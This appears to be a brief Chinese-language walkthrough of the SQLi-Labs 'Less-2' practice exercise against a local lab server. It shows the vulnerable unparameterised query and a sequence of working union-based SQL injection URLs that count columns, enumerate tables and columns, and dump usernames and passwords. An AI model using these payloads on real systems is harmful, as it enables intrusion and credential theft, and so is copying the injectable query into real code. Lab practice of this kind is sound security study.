带入执行的SQL语句
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
判断列数
http://192.168.0.5:9002/Less-2/?id=1 order by 3
http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,3
爆表名
http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
爆字段
http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=%27user%27
爆用户名密码
http://192.168.0.5:9002/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from security.users --+